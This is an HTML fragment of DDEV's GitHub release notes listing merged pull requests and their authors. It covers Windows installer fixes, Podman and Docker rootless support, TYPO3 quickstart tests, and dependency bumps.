<li>test(quickstart): fix frankenphp build by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3652421873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7889" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7889/hovercard" href="https://github.com/ddev/ddev/pull/7889">#7889</a></li>
<li>docs: update TYPO3 link by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3659715510" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7898" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7898/hovercard" href="https://github.com/ddev/ddev/pull/7898">#7898</a></li>
<li>build(curl): use trixie-backports to install newer curl by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3659620005" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7897" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7897/hovercard" href="https://github.com/ddev/ddev/pull/7897">#7897</a></li>
<li>fix(xdebug): Use a more sophisticated search for windows host ip address on WSL mirrored mode by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3640686765" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7880" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7880/hovercard" href="https://github.com/ddev/ddev/pull/7880">#7880</a></li>
<li>test(typo3): Fix TYPO3 quickstart, failing since TYPO3 v14.0.0 released by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3660976030" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7901" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7901/hovercard" href="https://github.com/ddev/ddev/pull/7901">#7901</a></li>
<li>fix: db port should be integer in generated TYPO3 AdditionalConfiguration.php, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3658026373" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7892" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7892/hovercard" href="https://github.com/ddev/ddev/issues/7892">#7892</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BreathCodeFlow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BreathCodeFlow">@BreathCodeFlow</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3658037285" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7893" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7893/hovercard" href="https://github.com/ddev/ddev/pull/7893">#7893</a></li>
<li>test(quickstart): php8.3 for silverstripe and symfony, disable typo3 v13 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3672156537" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7909" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7909/hovercard" href="https://github.com/ddev/ddev/pull/7909">#7909</a></li>
<li>fix(commands): make <code>HostWorkingDir</code> respect <code>WebWorkingDir</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crowjake/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crowjake">@crowjake</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3669387046" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7907" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7907/hovercard" href="https://github.com/ddev/ddev/pull/7907">#7907</a></li>
<li>build(docker): add more php8.5 packages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3671208529" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7908" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7908/hovercard" href="https://github.com/ddev/ddev/pull/7908">#7908</a></li>
<li>test(add-on): replace redis-commander with redis-insight by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3672679420" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7911" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7911/hovercard" href="https://github.com/ddev/ddev/pull/7911">#7911</a></li>
<li>chore(deprecation): update default MariaDB version to 11.8 for new projects, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2760145770" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6861" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6861/hovercard" href="https://github.com/ddev/ddev/issues/6861">#6861</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3607131104" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7824" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7824/hovercard" href="https://github.com/ddev/ddev/pull/7824">#7824</a></li>
<li>build(mkdocs): bump actions/setup-python from 6.0.0 to 6.1.0, pin click to 8.2.1 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3682052853" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7913" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7913/hovercard" href="https://github.com/ddev/ddev/pull/7913">#7913</a></li>
<li>fix: check for multiple global config dirs on <code>ddev start</code> and improve usage for <code>~/.ddev</code> in the docs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3374443982" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7582" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7582/hovercard" href="https://github.com/ddev/ddev/issues/7582">#7582</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623239781" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7859" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7859/hovercard" href="https://github.com/ddev/ddev/pull/7859">#7859</a></li>
<li>test(quickstart): remove version pins from Magento 2, Silverstripe, Symfony, TYPO3, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3662754285" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7905" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7905/hovercard" href="https://github.com/ddev/ddev/issues/7905">#7905</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3685279997" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7914" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7914/hovercard" href="https://github.com/ddev/ddev/pull/7914">#7914</a></li>
<li>fix: remove unnecessary debug output when probing for TYPO3 project type, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3654714403" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7890" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7890/hovercard" href="https://github.com/ddev/ddev/issues/7890">#7890</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3687124292" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7918" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7918/hovercard" href="https://github.com/ddev/ddev/pull/7918">#7918</a></li>
<li>test(windows): stop uninstalling as it leads to intermittent problems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3686346053" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7916" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7916/hovercard" href="https://github.com/ddev/ddev/pull/7916">#7916</a></li>
<li>fix: Windows installer refuses to install on wrong architecture, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3318865014" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7524" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7524/hovercard" href="https://github.com/ddev/ddev/issues/7524">#7524</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3660479712" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7900" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7900/hovercard" href="https://github.com/ddev/ddev/issues/7900">#7900</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3672315294" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7910" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7910/hovercard" href="https://github.com/ddev/ddev/pull/7910">#7910</a></li>
<li>feat(pantheon): address Pantheon hosting provider issues, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3533649620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7730" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7730/hovercard" href="https://github.com/ddev/ddev/issues/7730">#7730</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450001792" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7655" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7655/hovercard" href="https://github.com/ddev/ddev/issues/7655">#7655</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3612620085" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7837" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7837/hovercard" href="https://github.com/ddev/ddev/pull/7837">#7837</a></li>
<li>fix(collation): Use more portable default collations for mysql8.x and mariadb11.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3663530493" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7906" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7906/hovercard" href="https://github.com/ddev/ddev/pull/7906">#7906</a></li>
<li>feat: Warn WSL2 users with project on Windows filesystem, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3651875329" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7888" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7888/hovercard" href="https://github.com/ddev/ddev/issues/7888">#7888</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3686470597" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7917" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7917/hovercard" href="https://github.com/ddev/ddev/pull/7917">#7917</a></li>
<li>fix(diagnose): Remove the hard-coded IP "127.0.0.1" from the DNS check, since it may be incorrect, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3633143202" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7871" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7871/hovercard" href="https://github.com/ddev/ddev/issues/7871">#7871</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/grummbeer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/grummbeer">@grummbeer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3633286534" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7872" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7872/hovercard" href="https://github.com/ddev/ddev/pull/7872">#7872</a></li>
<li>docs: update instructions for maintainers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3698909154" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7924" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7924/hovercard" href="https://github.com/ddev/ddev/pull/7924">#7924</a></li>
<li>chore(debug): Migrate <code>ddev debug</code> statements to <code>ddev utility</code> statements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3699848765" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7925" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7925/hovercard" href="https://github.com/ddev/ddev/pull/7925">#7925</a></li>
<li>fix: Remove obsolete config syntax and commands for v1.25.0, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3607194599" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7825" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7825/hovercard" href="https://github.com/ddev/ddev/issues/7825">#7825</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3687175513" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7919" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7919/hovercard" href="https://github.com/ddev/ddev/pull/7919">#7919</a></li>
<li>build(php): install php8.5-xdebug (amd64/arm64), php7.0-7.3-redis (arm64), php8.5-memcached (amd64) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3707067166" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7928" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7928/hovercard" href="https://github.com/ddev/ddev/pull/7928">#7928</a></li>
<li>feat: add Podman rootless/rootful and Docker rootless support, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="623451687" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/2276" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/2276/hovercard" href="https://github.com/ddev/ddev/issues/2276">#2276</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="842390678" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/2899" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/2899/hovercard" href="https://github.com/ddev/ddev/issues/2899">#2899</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3492748614" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7702" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7702/hovercard" href="https://github.com/ddev/ddev/pull/7702">#7702</a></li>
<li>docs: Fix link to globalsign safenet drivers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3713142680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7932" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7932/hovercard" href="https://github.com/ddev/ddev/pull/7932">#7932</a></li>
<li>fix: use correct condition for host ports, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3693511292" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7920" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7920/hovercard" href="https://github.com/ddev/ddev/issues/7920">#7920</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3694772398" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7922" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7922/hovercard" href="https://github.com/ddev/ddev/pull/7922">#7922</a></li>
<li>fix(ddev-ssh-agent): Update ddev-ssh-agent to base on Trixie and accept PKCS8 RSA keys, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1653998930" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/4802" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/4802/hovercard" href="https://github.com/ddev/ddev/issues/4802">#4802</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3716441913" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7933" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7933/hovercard" href="https://github.com/ddev/ddev/pull/7933">#7933</a></li>
<li>fix(docker): support SELinux shared label, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2984740969" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7196" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7196/hovercard" href="https://github.com/ddev/ddev/issues/7196">#7196</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3723914792" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7939" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7939/hovercard" href="https://github.com/ddev/ddev/pull/7939">#7939</a></li>
<li>build(deps): bump actions/cache from 4 to 5 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3730870250" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7944" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7944/hovercard" href="https://github.com/ddev/ddev/pull/7944">#7944</a></li>
<li>build(deps): bump actions/upload-artifact from 5 to 6 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3730869671" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7943" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7943/hovercard" href="https://github.com/ddev/ddev/pull/7943">#7943</a></li>
<li>fix: convert Windows installer to per-user installation, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3575314275" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7776" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7776/hovercard" href="https://github.com/ddev/ddev/issues/7776">#7776</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3713015842" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7931" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7931/hovercard" href="https://github.com/ddev/ddev/pull/7931">#7931</a></li>
<li>feat: support using zstd for snapshots, fix <code>postgres:9</code> snapshot, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3616597924" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7844" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7844/hovercard" href="https://github.com/ddev/ddev/issues/7844">#7844</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1127360922" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/3583" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/3583/hovercard" href="https://github.com/ddev/ddev/issues/3583">#3583</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deviantintegral/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deviantintegral">@deviantintegral</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3616747625" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7845" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7845/hovercard" href="https://github.com/ddev/ddev/pull/7845">#7845</a></li>
<li>fix: only create volume for configured db type, add project label by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3720288833" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7937" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7937/hovercard" href="https://github.com/ddev/ddev/pull/7937">#7937</a></li>
<li>feat: restart supervisor for generic webserver and blackfire, xdebug, xhprof, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3728157390" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7941" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7941/hovercard" href="https://github.com/ddev/ddev/issues/7941">#7941</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3712251719" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev-frankenphp/issues/44" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev-frankenphp/issues/44/hovercard" href="https://github.com/ddev/ddev-frankenphp/issues/44">ddev/ddev-frankenphp#44</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3731758265" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7945" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7945/hovercard" href="https://github.com/ddev/ddev/pull/7945">#7945</a></li>
<li>fix(router): ensure Traefik dashboard port is always bound to localhost by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JUVOJustin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JUVOJustin">@JUVOJustin</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3730518709" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7942" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7942/hovercard" href="https://github.com/ddev/ddev/pull/7942">#7942</a></li>
<li>fix: fail on <code>ddev start</code> for docker-rootless w/o no-bind-mounts, don't test with latest rootless by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3738663620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7952" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7952/hovercard" href="https://github.com/ddev/ddev/pull/7952">#7952</a></li>
<li>fix: remove stale target files in getBackupCommand to prevent "Is a directory" errors, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3718149196" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7936" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7936/hovercard" href="https://github.com/ddev/ddev/issues/7936">#7936</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3720369430" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7938" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7938/hovercard" href="https://github.com/ddev/ddev/pull/7938">#7938</a></li>
<li>fix(windows): Change FindBashPath to detect user-local Git Bash installations on Windows, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3735819794" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7948" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7948/hovercard" href="https://github.com/ddev/ddev/issues/7948">#7948</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736233337" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7949" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7949/hovercard" href="https://github.com/ddev/ddev/pull/7949">#7949</a></li>
<li>test(lima): force limactl stop [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3744194229" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7957" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7957/hovercard" href="https://github.com/ddev/ddev/pull/7957">#7957</a></li>
<li>docs(ssh): Explain what to do when remote host identification has changed, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3734385388" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7946" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7946/hovercard" href="https://github.com/ddev/ddev/issues/7946">#7946</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3743993887" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7956" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7956/hovercard" href="https://github.com/ddev/ddev/pull/7956">#7956</a></li>
